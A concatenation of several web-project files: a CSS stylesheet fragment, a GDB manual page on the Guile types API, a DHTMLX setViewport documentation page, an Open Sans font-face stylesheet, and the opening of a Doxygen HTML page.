background: -o-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -ms-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: linear-gradient(to bottom, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a7d986', endColorstr='#94b36b', GradientType=0 );
}
#nav li a.pic {
padding-left:12px;
}
#nav li ul {
display: none;
padding:0;
}
#nav li ul li a {
padding: 2px 4px;
background: #161606 none repeat scroll 0 0;
border-bottom: 1px dotted #151515;
}
#nav li ul li {
list-style:none;
padding:0;
}
ul#nav {
list-style: none;
padding:0;
width:100%;
}
.clogError {
background-color: rgba(255, 0, 0, 0.2);
}
.clogWarning {
background-color: rgba(255, 255, 0, 0.2);
}
.clogSQL {
background-color: rgba(0, 0, 255, 0.2);
}
.clogDebug {
background-color: rgba(0, 0, 220, 0.1);
}
.clogStats {
background-color: rgba(0, 255, 0, 0.1);
}
.clogLimit {
background-color: rgba(255, 255, 0, 0.2);
}
@media print {
.noprint { display:none }
}
.ui-tooltip {
max-width: none !important;
}
.ui-tooltip-content div.header {
color: #006400;
}
.ui-tooltip-content div.content {
font-size: 10px;
color: #333333;
}
.ui-tooltip-content {
max-width: 500px !important;
overflow:auto !important;
opacity: 0.95;
border-radius: 5px !important;
border: transparent;
}
div.preformatted {
font-family: monospace;
white-space: pre;
}
ul.pagination {
display: inline-block;
padding: 0;
margin: 0;
vertical-align:middle;
}
ul.pagination li {
display: inline;
}
ul.pagination li a {
color: #bbbfc2;
float: left;
padding: 0px 2px 2px 2px;
text-decoration: none;
margin: 0px 1px;
}
ul.pagination li span {
color: #bbbfc2;
float: left;
padding: 0px 0px;
text-decoration: none;
margin: 0px 1px;
}
ul.pagination li a.active {
background: rgba(0, 0, 0, 0) linear-gradient(to bottom, rgba(167, 217, 134, 1) 0%, rgba(148, 179, 107, 1) 100%) repeat scroll 0 0;
color: black;
}
ul.pagination li a:hover:not(.active) {
background: rgba(167,217,134,0.4);
background: -moz-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -webkit-gradient(left top, left bottom, color-stop(0%, rgba(167,217,134,0.4)), color-stop(100%, rgba(148,179,107,0.2)));
background: -webkit-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -o-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: -ms-linear-gradient(top, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
background: linear-gradient(to bottom, rgba(167,217,134,0.4) 0%, rgba(148,179,107,0.4) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a7d986', endColorstr='#94b36b', GradientType=0 );
}
tr#realtime td:first-child {
height:64px;
}
.logEmergency {
background-color: rgba(250, 116, 32, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logCritical {
background-color: rgba(242, 23, 33, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logAlert {
background-color: rgba(242, 25, 36, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logWarning {
background-color: rgba(255, 122, 48, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logError {
background-color: rgba(251, 74, 20, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logNotice {
background-color: rgba(250, 253, 158, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logInfo {
background-color: rgba(204, 255, 204, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
.logDebug {
background-color: rgba(205, 207, 196, 0.2);
text-align: center;
width: 12.5%;
color: #eeeeee;
}
|
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gdb/Types-In-Guile.html | jocelynmass/nrf51 | <html lang="en">
<head>
<title>Types In Guile - Debugging with GDB</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Debugging with GDB">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Guile-API.html#Guile-API" title="Guile API">
<link rel="prev" href="Arithmetic-In-Guile.html#Arithmetic-In-Guile" title="Arithmetic In Guile">
<link rel="next" href="Guile-Pretty-Printing-API.html#Guile-Pretty-Printing-API" title="Guile Pretty Printing API">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
Copyright (C) 1988-2018 Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later version published by the Free Software Foundation; with the
Invariant Sections being ``Free Software'' and ``Free Software Needs
Free Documentation'', with the Front-Cover Texts being ``A GNU Manual,''
and with the Back-Cover Texts as in (a) below.
(a) The FSF's Back-Cover Text is: ``You are free to copy and modify
this GNU Manual. Buying copies from GNU Press supports the FSF in
developing GNU and promoting software freedom.''
-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<p>
<a name="Types-In-Guile"></a>
Next: <a rel="next" accesskey="n" href="Guile-Pretty-Printing-API.html#Guile-Pretty-Printing-API">Guile Pretty Printing API</a>,
Previous: <a rel="previous" accesskey="p" href="Arithmetic-In-Guile.html#Arithmetic-In-Guile">Arithmetic In Guile</a>,
Up: <a rel="up" accesskey="u" href="Guile-API.html#Guile-API">Guile API</a>
<hr>
</div>
<h5 class="subsubsection">23.3.3.7 Types In Guile</h5>
<p><a name="index-types-in-guile-2478"></a><a name="index-guile_002c-working-with-types-2479"></a>
<a name="index-g_t_003cgdb_003atype_003e-2480"></a><span class="sc">gdb</span> represents types from the inferior in objects of type
<code><gdb:type></code>.
<p>The following type-related procedures are provided by the
<code>(gdb)</code> module.
<div class="defun">
— Scheme Procedure: <b>type?</b><var> object<a name="index-type_003f-2481"></a></var><br>
<blockquote><p>Return <code>#t</code> if <var>object</var> is an object of type <code><gdb:type></code>.
Otherwise return <code>#f</code>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>lookup-type</b><var> name </var><span class="roman">[</span><var>#:block block</var><span class="roman">]</span><var><a name="index-lookup_002dtype-2482"></a></var><br>
<blockquote><p>This function looks up a type by its <var>name</var>, which must be a string.
<p>If <var>block</var> is given, it is an object of type <code><gdb:block></code>,
and <var>name</var> is looked up in that scope.
Otherwise, it is searched for globally.
<p>Ordinarily, this function will return an instance of <code><gdb:type></code>.
If the named type cannot be found, it will throw an exception.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-code</b><var> type<a name="index-type_002dcode-2483"></a></var><br>
<blockquote><p>Return the type code of <var>type</var>. The type code will be one of the
<code>TYPE_CODE_</code> constants defined below.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-tag</b><var> type<a name="index-type_002dtag-2484"></a></var><br>
<blockquote><p>Return the tag name of <var>type</var>. The tag name is the name after
<code>struct</code>, <code>union</code>, or <code>enum</code> in C and C<tt>++</tt>; not all
languages have this concept. If this type has no tag name, then
<code>#f</code> is returned.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-name</b><var> type<a name="index-type_002dname-2485"></a></var><br>
<blockquote><p>Return the name of <var>type</var>.
If this type has no name, then <code>#f</code> is returned.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-print-name</b><var> type<a name="index-type_002dprint_002dname-2486"></a></var><br>
<blockquote><p>Return the print name of <var>type</var>.
This returns something even for anonymous types.
For example, for an anonymous C struct <code>"struct {...}"</code> is returned.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-sizeof</b><var> type<a name="index-type_002dsizeof-2487"></a></var><br>
<blockquote><p>Return the size of this type, in target <code>char</code> units. Usually, a
target's <code>char</code> type will be an 8-bit byte. However, on some
unusual platforms, this type may have a different size.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-strip-typedefs</b><var> type<a name="index-type_002dstrip_002dtypedefs-2488"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> that represents the real type of <var>type</var>,
after removing all layers of typedefs.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-array</b><var> type n1 </var><span class="roman">[</span><var>n2</var><span class="roman">]</span><var><a name="index-type_002darray-2489"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents an array of this
type. If one argument is given, it is the inclusive upper bound of
the array; in this case the lower bound is zero. If two arguments are
given, the first argument is the lower bound of the array, and the
second argument is the upper bound of the array. An array's length
must not be negative, but the bounds can be.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-vector</b><var> type n1 </var><span class="roman">[</span><var>n2</var><span class="roman">]</span><var><a name="index-type_002dvector-2490"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents a vector of this
type. If one argument is given, it is the inclusive upper bound of
the vector; in this case the lower bound is zero. If two arguments are
given, the first argument is the lower bound of the vector, and the
second argument is the upper bound of the vector. A vector's length
must not be negative, but the bounds can be.
<p>The difference between an <code>array</code> and a <code>vector</code> is that
arrays behave like in C: when used in expressions they decay to a pointer
to the first element whereas vectors are treated as first class values.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-pointer</b><var> type<a name="index-type_002dpointer-2491"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents a pointer to
<var>type</var>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-range</b><var> type<a name="index-type_002drange-2492"></a></var><br>
<blockquote><p>Return a list of two elements: the low bound and high bound of <var>type</var>.
If <var>type</var> does not have a range, an exception is thrown.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-reference</b><var> type<a name="index-type_002dreference-2493"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents a reference to
<var>type</var>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-target</b><var> type<a name="index-type_002dtarget-2494"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents the target type
of <var>type</var>.
<p>For a pointer type, the target type is the type of the pointed-to
object. For an array type (meaning C-like arrays), the target type is
the type of the elements of the array. For a function or method type,
the target type is the type of the return value. For a complex type,
the target type is the type of the elements. For a typedef, the
target type is the aliased type.
<p>If the type does not have a target, this method will throw an
exception.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-const</b><var> type<a name="index-type_002dconst-2495"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents a
<code>const</code>-qualified variant of <var>type</var>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-volatile</b><var> type<a name="index-type_002dvolatile-2496"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents a
<code>volatile</code>-qualified variant of <var>type</var>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-unqualified</b><var> type<a name="index-type_002dunqualified-2497"></a></var><br>
<blockquote><p>Return a new <code><gdb:type></code> object which represents an unqualified
variant of <var>type</var>. That is, the result is neither <code>const</code> nor
<code>volatile</code>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-num-fields</b><var><a name="index-type_002dnum_002dfields-2498"></a></var><br>
<blockquote><p>Return the number of fields of <code><gdb:type></code> <var>type</var>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-fields</b><var> type<a name="index-type_002dfields-2499"></a></var><br>
<blockquote><p>Return the fields of <var>type</var> as a list.
For structure and union types, <code>fields</code> has the usual meaning.
Range types have two fields, the minimum and maximum values. Enum types
have one field per enum constant. Function and method types have one
field per parameter. The base types of C<tt>++</tt> classes are also
represented as fields. If the type has no fields, or does not fit
into one of these categories, an empty list will be returned.
See <a href="Fields-of-a-type-in-Guile.html#Fields-of-a-type-in-Guile">Fields of a type in Guile</a>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>make-field-iterator</b><var> type<a name="index-make_002dfield_002diterator-2500"></a></var><br>
<blockquote><p>Return the fields of <var>type</var> as a <gdb:iterator> object.
See <a href="Iterators-In-Guile.html#Iterators-In-Guile">Iterators In Guile</a>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-field</b><var> type field-name<a name="index-type_002dfield-2501"></a></var><br>
<blockquote><p>Return field named <var>field-name</var> in <var>type</var>.
The result is an object of type <code><gdb:field></code>.
See <a href="Fields-of-a-type-in-Guile.html#Fields-of-a-type-in-Guile">Fields of a type in Guile</a>.
If the type does not have fields, or <var>field-name</var> is not a field
of <var>type</var>, an exception is thrown.
<p>For example, if <code>some-type</code> is a <code><gdb:type></code> instance holding
a structure type, you can access its <code>foo</code> field with:
<pre class="smallexample"> (define bar (type-field some-type "foo"))
</pre>
<p><code>bar</code> will be a <code><gdb:field></code> object.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>type-has-field?</b><var> type name<a name="index-type_002dhas_002dfield_003f-2502"></a></var><br>
<blockquote><p>Return <code>#t</code> if <code><gdb:type></code> <var>type</var> has field named <var>name</var>.
Otherwise return <code>#f</code>.
</p></blockquote></div>
<p>Each type has a code, which indicates what category this type falls
into. The available type categories are represented by constants
defined in the <code>(gdb)</code> module:
<dl>
<dt><code>TYPE_CODE_PTR</code><a name="index-TYPE_005fCODE_005fPTR-2503"></a><dd>The type is a pointer.
<br><dt><code>TYPE_CODE_ARRAY</code><a name="index-TYPE_005fCODE_005fARRAY-2504"></a><dd>The type is an array.
<br><dt><code>TYPE_CODE_STRUCT</code><a name="index-TYPE_005fCODE_005fSTRUCT-2505"></a><dd>The type is a structure.
<br><dt><code>TYPE_CODE_UNION</code><a name="index-TYPE_005fCODE_005fUNION-2506"></a><dd>The type is a union.
<br><dt><code>TYPE_CODE_ENUM</code><a name="index-TYPE_005fCODE_005fENUM-2507"></a><dd>The type is an enum.
<br><dt><code>TYPE_CODE_FLAGS</code><a name="index-TYPE_005fCODE_005fFLAGS-2508"></a><dd>A bit flags type, used for things such as status registers.
<br><dt><code>TYPE_CODE_FUNC</code><a name="index-TYPE_005fCODE_005fFUNC-2509"></a><dd>The type is a function.
<br><dt><code>TYPE_CODE_INT</code><a name="index-TYPE_005fCODE_005fINT-2510"></a><dd>The type is an integer type.
<br><dt><code>TYPE_CODE_FLT</code><a name="index-TYPE_005fCODE_005fFLT-2511"></a><dd>A floating point type.
<br><dt><code>TYPE_CODE_VOID</code><a name="index-TYPE_005fCODE_005fVOID-2512"></a><dd>The special type <code>void</code>.
<br><dt><code>TYPE_CODE_SET</code><a name="index-TYPE_005fCODE_005fSET-2513"></a><dd>A Pascal set type.
<br><dt><code>TYPE_CODE_RANGE</code><a name="index-TYPE_005fCODE_005fRANGE-2514"></a><dd>A range type, that is, an integer type with bounds.
<br><dt><code>TYPE_CODE_STRING</code><a name="index-TYPE_005fCODE_005fSTRING-2515"></a><dd>A string type. Note that this is only used for certain languages with
language-defined string types; C strings are not represented this way.
<br><dt><code>TYPE_CODE_BITSTRING</code><a name="index-TYPE_005fCODE_005fBITSTRING-2516"></a><dd>A string of bits. It is deprecated.
<br><dt><code>TYPE_CODE_ERROR</code><a name="index-TYPE_005fCODE_005fERROR-2517"></a><dd>An unknown or erroneous type.
<br><dt><code>TYPE_CODE_METHOD</code><a name="index-TYPE_005fCODE_005fMETHOD-2518"></a><dd>A method type, as found in C<tt>++</tt>.
<br><dt><code>TYPE_CODE_METHODPTR</code><a name="index-TYPE_005fCODE_005fMETHODPTR-2519"></a><dd>A pointer-to-member-function.
<br><dt><code>TYPE_CODE_MEMBERPTR</code><a name="index-TYPE_005fCODE_005fMEMBERPTR-2520"></a><dd>A pointer-to-member.
<br><dt><code>TYPE_CODE_REF</code><a name="index-TYPE_005fCODE_005fREF-2521"></a><dd>A reference type.
<br><dt><code>TYPE_CODE_CHAR</code><a name="index-TYPE_005fCODE_005fCHAR-2522"></a><dd>A character type.
<br><dt><code>TYPE_CODE_BOOL</code><a name="index-TYPE_005fCODE_005fBOOL-2523"></a><dd>A boolean type.
<br><dt><code>TYPE_CODE_COMPLEX</code><a name="index-TYPE_005fCODE_005fCOMPLEX-2524"></a><dd>A complex float type.
<br><dt><code>TYPE_CODE_TYPEDEF</code><a name="index-TYPE_005fCODE_005fTYPEDEF-2525"></a><dd>A typedef to some other type.
<br><dt><code>TYPE_CODE_NAMESPACE</code><a name="index-TYPE_005fCODE_005fNAMESPACE-2526"></a><dd>A C<tt>++</tt> namespace.
<br><dt><code>TYPE_CODE_DECFLOAT</code><a name="index-TYPE_005fCODE_005fDECFLOAT-2527"></a><dd>A decimal floating point type.
<br><dt><code>TYPE_CODE_INTERNAL_FUNCTION</code><a name="index-TYPE_005fCODE_005fINTERNAL_005fFUNCTION-2528"></a><dd>A function internal to <span class="sc">gdb</span>. This is the type used to represent
convenience functions (see <a href="Convenience-Funs.html#Convenience-Funs">Convenience Funs</a>).
</dl>
<p>Further support for types is provided in the <code>(gdb types)</code>
Guile module (see <a href="Guile-Types-Module.html#Guile-Types-Module">Guile Types Module</a>).
<p><a name="Fields-of-a-type-in-Guile"></a>
Each field is represented as an object of type <code><gdb:field></code>.
<p>The following field-related procedures are provided by the
<code>(gdb)</code> module:
<div class="defun">
— Scheme Procedure: <b>field?</b><var> object<a name="index-field_003f-2529"></a></var><br>
<blockquote><p>Return <code>#t</code> if <var>object</var> is an object of type <code><gdb:field></code>.
Otherwise return <code>#f</code>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-name</b><var> field<a name="index-field_002dname-2530"></a></var><br>
<blockquote><p>Return the name of the field, or <code>#f</code> for anonymous fields.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-type</b><var> field<a name="index-field_002dtype-2531"></a></var><br>
<blockquote><p>Return the type of the field. This is usually an instance of
<code><gdb:type></code>, but it can be <code>#f</code> in some situations.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-enumval</b><var> field<a name="index-field_002denumval-2532"></a></var><br>
<blockquote><p>Return the enum value represented by <code><gdb:field></code> <var>field</var>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-bitpos</b><var> field<a name="index-field_002dbitpos-2533"></a></var><br>
<blockquote><p>Return the bit position of <code><gdb:field></code> <var>field</var>.
This attribute is not available for <code>static</code> fields (as in
C<tt>++</tt>).
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-bitsize</b><var> field<a name="index-field_002dbitsize-2534"></a></var><br>
<blockquote><p>If the field is packed, or is a bitfield, return the size of
<code><gdb:field></code> <var>field</var> in bits. Otherwise, zero is returned;
in which case the field's size is given by its type.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-artificial?</b><var> field<a name="index-field_002dartificial_003f-2535"></a></var><br>
<blockquote><p>Return <code>#t</code> if the field is artificial, usually meaning that
it was provided by the compiler and not the user.
Otherwise return <code>#f</code>.
</p></blockquote></div>
<div class="defun">
— Scheme Procedure: <b>field-base-class?</b><var> field<a name="index-field_002dbase_002dclass_003f-2536"></a></var><br>
<blockquote><p>Return <code>#t</code> if the field represents a base class of a C<tt>++</tt>
structure.
Otherwise return <code>#f</code>.
</p></blockquote></div>
</body></html>
|
vendor/assets/dhtmlx/docsExplorer/dhtmlxwindows/dhtmlxwindows___api_method_dhtmlxwindows_setviewport.html | ManageIQ/dhtmlx-rails | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css" type="text/css" media="screen" title="no title" charset="utf-8"><title>
dhtmlxwindows:api_method_dhtmlxwindows_setviewport [DHX documentation]
</title></head>
<body>
<div class="dokuwiki">
<div class="stylehead">
<div class="header">
<a class="logo" href="http://dhtmlx.com" title="DHTMLX Home Page"></a>
<span class="tittle-dhtmlx">DHTMLX Docs & Samples Explorer</span>
<div class="search-field">
<form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form> </div>
<div class="buttons">
<a class="doc"></a>
<a title="DHTMLX Samples homepage" href="../samples.html" class="sample"/></a>
</div>
<!-- <div class="pagename">
[[<a href="#" title="Backlinks">dhtmlxwindows:api_method_dhtmlxwindows_setviewport</a>]]
</div>
<div class="logo">
<a href="/dhtmlx/docs/doku.php" name="dokuwiki__top" id="dokuwiki__top" accesskey="h" title="[H]">DHX documentation</a> </div>
<div class="clearer"></div>-->
</div>
<!-- <div class="bar" id="bar__top">
<div class="bar-left" id="bar__topleft">
<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> <form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form> </div>
<div class="bar-right" id="bar__topright">
<form class="button btn_recent" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="recent" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Recent changes" class="button" accesskey="r" title="Recent changes [R]" /></div></form> <form action="/dhtmlx/docs/doku.php" accept-charset="utf-8" id="dw__search"><div class="no"><input type="hidden" name="do" value="search" /><input type="text" id="qsearch__in" accesskey="f" name="id" title="Search" /><button type="submit"></button><div id="qsearch__out" class="ajax_qsearch JSpopup"></div></div></form>
</div>
<div class="clearer"></div>
</div> -->
<!-- <div class="breadcrumbs">
<span class="bchead">Trace:</span> <span class="bcsep">»</span> <span class="curid"><a href="/dhtmlx/docs/doku.php?id=dhtmlxwindows:api_method_dhtmlxwindows_setviewport" class="breadcrumbs" title="dhtmlxwindows:api_method_dhtmlxwindows_setviewport">api_method_dhtmlxwindows_setviewport</a></span> </div>
-->
</div>
<div class="page">
<!-- wikipage start -->
<p>
<div class='backlinks'><div class='backlink last_backlink'><img src="icons___file.gif" class="media" alt="" /><a href="../index.html" class="wikilink1" title="start">Index</a></div><div class='arrow'></div><div class='backlink last_backlink'><img src="icons___windows.gif" class="media" alt="" /><a href=index.html class="wikilink1" title="dhtmlxwindows:toc">dhtmlxwindows</a></div><div class='arrow'></div><div class='backlink'><a href="dhtmlxwindows___api_toc_alpha.html" class="wikilink1" title="dhtmlxwindows:api_toc_alpha">API Methods</a></div></div>
</p>
<h3><a name="setviewport_x_y_width_height_parentobj" id="setviewport_x_y_width_height_parentobj">setViewport(x, y, width, height, parentObj)</a></h3>
<div class="level3">
<p>
<em>Required library edition:</em> <img src="common___any_ed.gif" class="media" title="This method works with any edition of DHTMLX library" alt="This method works with any edition of DHTMLX library" /><br/>
<em>Required library file: dhtmlxwindows.js</em>
</p>
<p>
sets user-defined viewport if enableAutoViewport(false)
</p>
<ul>
<li class="level1"><div class="li"> x - top-left viewport corner's X-coordinate</div>
</li>
<li class="level1"><div class="li"> y - top-left viewport corner's Y-coordinate</div>
</li>
<li class="level1"><div class="li"> width - viewport's width</div>
</li>
<li class="level1"><div class="li"> height - viewport's height</div>
</li>
<li class="level1"><div class="li"> parentObj - create inside of parentObj object</div>
</li>
</ul>
<pre class="code javascript"> dhxWins.<span class="me1">setViewport</span><span class="br0">(</span>x<span class="sy0">,</span> y<span class="sy0">,</span> width<span class="sy0">,</span> height<span class="sy0">,</span> parentObj<span class="br0">)</span>;</pre>
</div>
<div class="secedit"><form class="button btn_secedit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="lines" value="82-" /><input type="hidden" name="rev" value="1335474000" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Edit" class="button" title="setViewport(x, y, width, height, parentObj)" /></div></form></div>
<!-- wikipage stop -->
</div>
<div class="clearer"> </div>
<div class="stylefoot">
<div class="meta">
<div class="user">
</div>
<!-- <div class="doc">
dhtmlxwindows/api_method_dhtmlxwindows_setviewport.txt · Last modified: 2012/04/27 00:00 (external edit) </div>
</div>-->
<!--<div class="bar" id="bar__bottom">-->
<!--<div class="bar-left" id="bar__bottomleft">-->
<!--<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form>-->
<!--<form class="button btn_revs" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="revisions" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Old revisions" class="button" accesskey="o" title="Old revisions [O]" /></div></form>-->
<!--</div>-->
<!--<div class="bar-right" id="bar__bottomright">-->
<!---->
<!---->
<!---->
<!---->
<!---->
<!--<form class="button btn_index" method="get" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="index" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Index" class="button" accesskey="x" title="Index [X]" /></div></form>-->
<!--<a class="nolink" href="#dokuwiki__top"><input type="button" class="button" value="Back to top" onclick="window.scrollTo(0, 0)" title="Back to top" /></a> -->
<!--</div>-->
<!--<div class="clearer"></div>-->
<!--</div>-->
</div>
</div>
<div class="footerinc">
</div>
<div class="no"><img src="/dhtmlx/docs/lib/exe/indexer.php?id=dhtmlxwindows%3Aapi_method_dhtmlxwindows_setviewport&1383917644" width="1" height="1" alt="" /></div>
<div class="footer">
<div class="footer-logo"></div>
<div class="copyright">Copyright © 2013 Dinamenta, UAB<br />All rights reserved.</div>
<form class="button btn_edit" method="post" action="/dhtmlx/docs/doku.php"><div class="no"><input type="hidden" name="do" value="edit" /><input type="hidden" name="rev" value="" /><input type="hidden" name="id" value="dhtmlxwindows:api_method_dhtmlxwindows_setviewport" /><input type="submit" value="Edit this page" class="button" accesskey="e" title="Edit this page [E]" /></div></form> </div>
</body>
</html>
|
wp-includes/googleapis/css.css | laiy/CMS-SDCS | @font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 300;
src: local('Open Sans Light'), local('OpenSans-Light'), url(DXI1ORHCpsQm3Vp6mXoaTegdm0LZdjqr5-oayXSOefg.woff2) format('woff2'), url(DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff) format('woff');
}
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: local('Open Sans'), local('OpenSans'), url(cJZKeOuBrn4kERxqtaUH3VtXRa8TVwTICgirnJhmVJw.woff2) format('woff2'), url(cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format('woff');
}
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 600;
src: local('Open Sans Semibold'), local('OpenSans-Semibold'), url(MTP_ySUJH_bn48VBG8sNSugdm0LZdjqr5-oayXSOefg.woff2) format('woff2'), url(MTP_ySUJH_bn48VBG8sNSnhCUOGz7vYGh680lGh-uXM.woff) format('woff');
}
@font-face {
font-family: 'Open Sans';
font-style: italic;
font-weight: 300;
src: local('Open Sans Light Italic'), local('OpenSansLight-Italic'), url(PRmiXeptR36kaC0GEAetxko2lTMeWA_kmIyWrkNCwPc.woff2) format('woff2'), url(PRmiXeptR36kaC0GEAetxh_xHqYgAV9Bl_ZQbYUxnQU.woff) format('woff');
}
@font-face {
font-family: 'Open Sans';
font-style: italic;
font-weight: 400;
src: local('Open Sans Italic'), local('OpenSans-Italic'), url(xjAJXh38I15wypJXxuGMBo4P5ICox8Kq3LLUNMylGO4.woff2) format('woff2'), url(xjAJXh38I15wypJXxuGMBobN6UDyHWBl620a-IRfuBk.woff) format('woff');
}
@font-face {
font-family: 'Open Sans';
font-style: italic;
font-weight: 600;
src: local('Open Sans Semibold Italic'), local('OpenSans-SemiboldItalic'), url(PRmiXeptR36kaC0GEAetxl2umOyRU7PgRiv8DXcgJjk.woff2) format('woff2'), url(PRmiXeptR36kaC0GEAetxn5HxGBcBvicCpTp6spHfNo.woff) format('woff');
}
|
Unity/Outsided Content/Documentation - Create GUI/classes.html | SKSKSUnite/OZone-GameRealm | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.4"/>
